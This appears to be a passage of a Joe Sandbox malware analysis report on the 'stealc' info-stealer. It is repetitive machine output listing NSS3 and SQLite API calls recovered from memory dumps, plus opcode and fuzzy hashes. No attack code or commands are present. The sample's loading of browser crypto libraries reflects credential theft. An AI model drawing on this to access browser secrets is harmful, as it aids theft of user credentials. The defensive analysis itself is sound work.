                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                            • String ID: %s=%c%s%c$%s=%s
                                                                                                                                                                            • API String ID: 2709355791-2032576422
                                                                                                                                                                            • Opcode ID: d49c2e07f1d38b43a3176b7336c57b5e0911431098c06c7e3bb25b0e35a43075
                                                                                                                                                                            • Instruction ID: 7e3ade42c8fb4088d9cca7edde9acbe58ccc28e34966fbe73447a583c65871ec
                                                                                                                                                                            • Opcode Fuzzy Hash: d49c2e07f1d38b43a3176b7336c57b5e0911431098c06c7e3bb25b0e35a43075
                                                                                                                                                                            • Instruction Fuzzy Hash: F6514D21E041498BFB21C96987507FF7BF59FC6398F144927E8B4A7B41D325890787A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C837E27
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C837E67
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C837EED
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C837F2E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 912837312-598938438
                                                                                                                                                                            • Opcode ID: 47efe5451cd1ceeee8f7749f09a5c38ae473f371bb59bbbb54b868b26ac1d6c5
                                                                                                                                                                            • Instruction ID: 9a3219e03b35417389342134d64109c71c928383344cb7596340043d6769b9a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 47efe5451cd1ceeee8f7749f09a5c38ae473f371bb59bbbb54b868b26ac1d6c5
                                                                                                                                                                            • Instruction Fuzzy Hash: 1661C470A04255DFDB25CFA9CA90B6A37A2BF45708F146868EC0D5BB51D730EC45CBE1
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C81FD7A
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81FD94
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C81FE3C
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81FE83
                                                                                                                                                                              • Part of subcall function 6C81FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C81FEFA
                                                                                                                                                                              • Part of subcall function 6C81FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C81FF3B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 1169254434-598938438
                                                                                                                                                                            • Opcode ID: b897264e4f6df72adde155be8adee932745dfaf7bfb3e88e1d0f166d67fa1d8f
                                                                                                                                                                            • Instruction ID: 8bf6b9dd99306829b235a85bbbd8ad23808d55da9c6cfffde882364a9f64ba9e
                                                                                                                                                                            • Opcode Fuzzy Hash: b897264e4f6df72adde155be8adee932745dfaf7bfb3e88e1d0f166d67fa1d8f
                                                                                                                                                                            • Instruction Fuzzy Hash: E0518271A042069FDB14CFA9D9D0AAEB7F1FF58308F144469E905ABB52E731EC50CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,00000000,?,6C8B124D,00000001), ref: 6C8A8D19
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6C8B124D,00000001), ref: 6C8A8D32
                                                                                                                                                                            • PL_ArenaRelease.NSS3(?,?,?,?,?,6C8B124D,00000001), ref: 6C8A8D73
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6C8B124D,00000001), ref: 6C8A8D8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6C8B124D,00000001), ref: 6C8A8DBA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                            • String ID: KRAM$KRAM
                                                                                                                                                                            • API String ID: 2419422920-169145855
                                                                                                                                                                            • Opcode ID: a202dade032c0dab88d27d660cf3f5f520ea43bda7f005ad3ae5ba89357ee44a
                                                                                                                                                                            • Instruction ID: 831ba0c86bc9a134ab7a97874f84096972aa18c4c0d810486047cc2c10b3f723
                                                                                                                                                                            • Opcode Fuzzy Hash: a202dade032c0dab88d27d660cf3f5f520ea43bda7f005ad3ae5ba89357ee44a
                                                                                                                                                                            • Instruction Fuzzy Hash: 9621A1B1A086458FCB10EFB8C68466EBBF0FF55309F158D6AD99887701E734D852CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C9A0EE6
                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C9A0EFA
                                                                                                                                                                              • Part of subcall function 6C88AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C88AF0E
                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F16
                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F1C
                                                                                                                                                                            • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F25
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9A0F2B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                            • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                            • API String ID: 2948422844-1374795319
                                                                                                                                                                            • Opcode ID: 5497c8ed757cd6ad5b6ea55c3f78e0324099f8df548f2d4783990e1573677512
                                                                                                                                                                            • Instruction ID: a942fd1016e360b36f1c2b6c3c108be93f2b75975cac956ba967e43130bd144e
                                                                                                                                                                            • Opcode Fuzzy Hash: 5497c8ed757cd6ad5b6ea55c3f78e0324099f8df548f2d4783990e1573677512
                                                                                                                                                                            • Instruction Fuzzy Hash: D601C0B6900204BBDF01AFA4DC45C9B3F3CEF4A368B114024FD0A97701D632E96086B2
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C964DC3
                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C964DE0
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6C964DDA
                                                                                                                                                                            • misuse, xrefs: 6C964DD5
                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C964DCB
                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6C964DBD
                                                                                                                                                                            • invalid, xrefs: 6C964DB8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                            • API String ID: 632333372-2974027950
                                                                                                                                                                            • Opcode ID: 94913f569c76b235039d22424d0215a26dfda062b679ef6d7d25337a6673442e
                                                                                                                                                                            • Instruction ID: 284d98ec160067ad172add5e41abd2e904fc34d50778cbfdffc2435cd37a06b0
                                                                                                                                                                            • Opcode Fuzzy Hash: 94913f569c76b235039d22424d0215a26dfda062b679ef6d7d25337a6673442e
                                                                                                                                                                            • Instruction Fuzzy Hash: 4CF0B412F149787BEB10819ACD31F86375D4F41359F4609A2EE086BED2E606F89086D2
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C964E30
                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C964E4D
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6C964E47
                                                                                                                                                                            • misuse, xrefs: 6C964E42
                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C964E38
                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6C964E2A
                                                                                                                                                                            • invalid, xrefs: 6C964E25
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                            • API String ID: 632333372-2974027950
                                                                                                                                                                            • Opcode ID: 783075e0dcfa1071667071c0269aec5b79f6f0f22c7b0004ec23ba824aef3a9d
                                                                                                                                                                            • Instruction ID: 61ef9a11af1af6c79509cd5e42ccd43307e431bef2b5509a18c1dbb4575a6a8f
                                                                                                                                                                            • Opcode Fuzzy Hash: 783075e0dcfa1071667071c0269aec5b79f6f0f22c7b0004ec23ba824aef3a9d
                                                                                                                                                                            • Instruction Fuzzy Hash: 18F0E221F849382BF72280AA9D31FC2378D4B02369F4988A1EA0867FD2D609D86046D3
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000,6C8D1444,?,00000001,?,00000000,00000000,?,?,6C8D1444,?,?,00000000,?,?), ref: 6C8D0CB3
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?,?,6C8D1444,?), ref: 6C8D0DC1
                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?,?,6C8D1444,?), ref: 6C8D0DEC
                                                                                                                                                                              • Part of subcall function 6C8F0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C892AF5,?,?,?,?,?,6C890A1B,00000000), ref: 6C8F0F1A
                                                                                                                                                                              • Part of subcall function 6C8F0F10: malloc.MOZGLUE(00000001), ref: 6C8F0F30
                                                                                                                                                                              • Part of subcall function 6C8F0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C8F0F42
                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?), ref: 6C8D0DFF
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C8D1444,?,00000001,?,00000000), ref: 6C8D0E16
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?), ref: 6C8D0E53
                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?,?,6C8D1444,?,?,00000000), ref: 6C8D0E65
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8D1444,?,00000001,?,00000000,00000000,?), ref: 6C8D0E79
                                                                                                                                                                              • Part of subcall function 6C8E1560: TlsGetValue.KERNEL32(00000000,?,6C8B0844,?), ref: 6C8E157A
                                                                                                                                                                              • Part of subcall function 6C8E1560: EnterCriticalSection.KERNEL32(?,?,?,6C8B0844,?), ref: 6C8E158F
                                                                                                                                                                              • Part of subcall function 6C8E1560: PR_Unlock.NSS3(?,?,?,?,6C8B0844,?), ref: 6C8E15B2
                                                                                                                                                                              • Part of subcall function 6C8AB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C8B1397,00000000,?,6C8ACF93,5B5F5EC0,00000000,?,6C8B1397,?), ref: 6C8AB1CB
                                                                                                                                                                              • Part of subcall function 6C8AB1A0: free.MOZGLUE(5B5F5EC0,?,6C8ACF93,5B5F5EC0,00000000,?,6C8B1397,?), ref: 6C8AB1D2
                                                                                                                                                                              • Part of subcall function 6C8A89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C8A88AE,-00000008), ref: 6C8A8A04
                                                                                                                                                                              • Part of subcall function 6C8A89E0: EnterCriticalSection.KERNEL32(?), ref: 6C8A8A15
                                                                                                                                                                              • Part of subcall function 6C8A89E0: memset.VCRUNTIME140(6C8A88AE,00000000,00000132), ref: 6C8A8A27
                                                                                                                                                                              • Part of subcall function 6C8A89E0: PR_Unlock.NSS3(?), ref: 6C8A8A35
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1601681851-0
                                                                                                                                                                            • Opcode ID: bd0d86c7dfb6a089dbd121d2d6f659d5c02899fd7c8a6a1f72a3ad53c3203ac6
                                                                                                                                                                            • Instruction ID: a442728ed37dc1b20c7f6e9e5f4a07bcc6ab8af183883d842028db4f887178e9
                                                                                                                                                                            • Opcode Fuzzy Hash: bd0d86c7dfb6a089dbd121d2d6f659d5c02899fd7c8a6a1f72a3ad53c3203ac6
                                                                                                                                                                            • Instruction Fuzzy Hash: 7851C9B5D002155FEB209F68DE81ABB37A89F55218F560934EC05EB702FB31FD1987A2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8A8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C8B0715), ref: 6C8A8859
                                                                                                                                                                              • Part of subcall function 6C8A8850: PR_NewLock.NSS3 ref: 6C8A8874
                                                                                                                                                                              • Part of subcall function 6C8A8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C8A888D
                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6C8A9CAD
                                                                                                                                                                              • Part of subcall function 6C9598D0: calloc.MOZGLUE(00000001,00000084,6C880936,00000001,?,6C88102C), ref: 6C9598E5
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807AD
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807CD
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807D6
                                                                                                                                                                              • Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C81204A), ref: 6C8807E4
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,6C81204A), ref: 6C880864
                                                                                                                                                                              • Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C880880
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,6C81204A), ref: 6C8808CB
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808D7
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808FB
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8A9CE8
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6C8AECEC,6C8B2FCD,00000000,?,6C8B2FCD,?), ref: 6C8A9D01
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6C8AECEC,6C8B2FCD,00000000,?,6C8B2FCD,?), ref: 6C8A9D38
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6C8AECEC,6C8B2FCD,00000000,?,6C8B2FCD,?), ref: 6C8A9D4D
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C8A9D70
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C8A9DC3
                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6C8A9DDD
                                                                                                                                                                              • Part of subcall function 6C8A88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C8B0725,00000000,00000058), ref: 6C8A8906
                                                                                                                                                                              • Part of subcall function 6C8A88D0: EnterCriticalSection.KERNEL32(?), ref: 6C8A891A
                                                                                                                                                                              • Part of subcall function 6C8A88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C8A894A
                                                                                                                                                                              • Part of subcall function 6C8A88D0: calloc.MOZGLUE(00000001,6C8B072D,00000000,00000000,00000000,?,6C8B0725,00000000,00000058), ref: 6C8A8959
                                                                                                                                                                              • Part of subcall function 6C8A88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8993
                                                                                                                                                                              • Part of subcall function 6C8A88D0: PR_Unlock.NSS3(?), ref: 6C8A89AF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3394263606-0
                                                                                                                                                                            • Opcode ID: ce1e62998cd3bbba12686241430ae16ceaca448cabb943b94e847df9a832d975
                                                                                                                                                                            • Instruction ID: 44307bafc9ed488c05660167281dc896824ebc1825218f84056e8b403ceeb0d0
                                                                                                                                                                            • Opcode Fuzzy Hash: ce1e62998cd3bbba12686241430ae16ceaca448cabb943b94e847df9a832d975
                                                                                                                                                                            • Instruction Fuzzy Hash: 88518670A09705DFDB10EFA8C28466EBBF0BF44355F158D28D8989BB10DB31E885CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C9A9EC0
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C9A9EF9
                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6C9A9F73
